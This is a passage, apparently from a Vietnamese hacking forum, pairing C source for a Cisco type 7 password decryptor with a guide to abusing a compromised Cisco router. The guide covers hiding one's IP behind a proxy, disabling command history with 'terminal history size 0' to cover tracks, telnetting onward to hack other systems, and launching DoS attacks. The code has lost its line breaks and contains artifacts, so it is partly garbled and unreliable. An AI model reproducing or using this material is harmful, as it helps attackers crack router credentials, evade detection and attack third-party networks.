#include <stdio.h>#include <ctype.h>char xlat[] = {0x64, 0x73, 0x66, 0x64, 0x3b, 0x6b, 0x66, 0x6f,0x41, 0x2c, 0x2e, 0x69, 0x79, 0x65, 0x77, 0x72,0x6b, 0x6c, 0x64, 0x4a, 0x4b, 0x44};char pw_str1[] = \"password 7 \";char pw_str2[] = \"enable-password 7 \";char *pname;cdecrypt(enc_pw, dec_pw)char *enc_pw;char *dec_pw;{unsigned int seed, i, val = 0;if(strlen(enc_pw) & 1)return(-1);seed = (enc_pw[0] - '0') * 10 + enc_pw[1] - '0';if (seed > 15 || !isdigit(enc_pw[0]) || !isdigit(enc_pw[1]))return(-1);for (i = 2; i <= strlen(enc_pw); i++) {if(i !=2 && !(i & 1)) {dec_pw[i / 2 - 2] = val ^ xlat[seed++];val = 0;}val *= 16;if(isdigit(enc_pw[i] = toupper(enc_pw[i]))) {val += enc_pw[i] - '0';continue;}if(enc_pw[i] >= 'A' && enc_pw[i] <= 'F') {val += enc_pw[i] - 'A' + 10;continue;}if(strlen(enc_pw) != i)return(-1);}dec_pw[++i / 2] = 0;return(0);}usage(){fprintf(stdout, \"Usage: %s -p <encrypted password>n\", pname);fprintf(stdout, \" %s <router config file> <output file>n\",pname);return(0);}main(argc,argv)int argc;char **argv;{FILE *in = stdin, *out = stdout;char line[257];char passwd[65];unsigned int i, pw_pos;pname = argv[0];if(argc > 1){if(argc > 3) {usage();exit(1);}if(argv[1][0] == '-'){switch(argv[1][1]) {case 'h':usage();break;case 'p':if(cdecrypt(argv[2], passwd)) {fprintf(stderr, \"Error.n\");exit(1);}fprintf(stdout, \"password: %sn\", passwd);break;default:fprintf(stderr, \"%s: unknow option.\", pname);}return(0);}if((in = fopen(argv[1], \"rt\")) == NULL)exit(1);if(argc > 2)if((out = fopen(argv[2], \"wt\")) == NULL)exit(1);}while(1) {for(i = 0; i < 256; i++) {if((line[i] = fgetc(in)) == EOF) {if(i)break;fclose(in);fclose(out);return(0);}if(l ine[i] == 'r')i--;if(line[i] == 'n')break;}pw_pos = 0;line[i] = 0;if(!strncmp(line, pw_str1, strlen(pw_str1)))pw_pos = strlen(pw_str1);if(!strncmp(line, pw_str2, strlen(pw_str2)))pw_pos = strlen(pw_str2);if(!pw_pos) {fprintf(stdout, \"%sn\", line);continue;}if(cdecrypt(&line[pw_pos], passwd)) {fprintf(stderr, \"Error.n\");exit(1);}else {if(pw_pos == strlen(pw_str1))fprintf(out, \"%s\", pw_str1);elsefprintf(out, \"%s\", pw_str2);fprintf(out, \"%sn\", passwd);}}}
Nếu bạn không có Linux, cách duy nhất để crack mật khẩu là chạy một từ điển hay tấn công lên file password với John hay password-cracker khác. Pó tay.
-------------------------------------------------
Section 5:
Sử dụng cisco router
Để sử dụng công nghệ kư diệu này, bạn hăy kết nối tới nó, sử dụng proxy nếu bạn không muốn IP của bạn bị phát hiện. Một lần bạn Đăng nhập, bạn muốn tắt History để không muốn ai có thể biết bạn làm ǵ, bạn hăy gơ ”terminal history size 0” .Bây giờ nó sẽ không nhớ bất cứ cái ǵ hết trơn ah. Gơ “?” sẽ hiện ra danh sách các lệnh của router và bạn có thể sử dụng hầu hết các lệnh đó. Những router này thường có telnet, như vậy bạn có thể dụng telnet để nối tới những hệ thống khác (như Unix) và hack chúng luôn thể. Nó cũng được trang bị với ping bà traceroute. Bạn có thể sử dụng hệ thống trace hay những cuộc tấn công bằng DoS. Bạn có thể dùng chúng để chặn những gói dữ liệu, nhưng tôi không giới thiệu điều này, trong khi nó sẽ không luôn luôn là việc, nó sẽ làm bạn phải chú ư…
[Only Registered And Activated Users Can See Links] ([Only Registered And Activated Users Can See Links])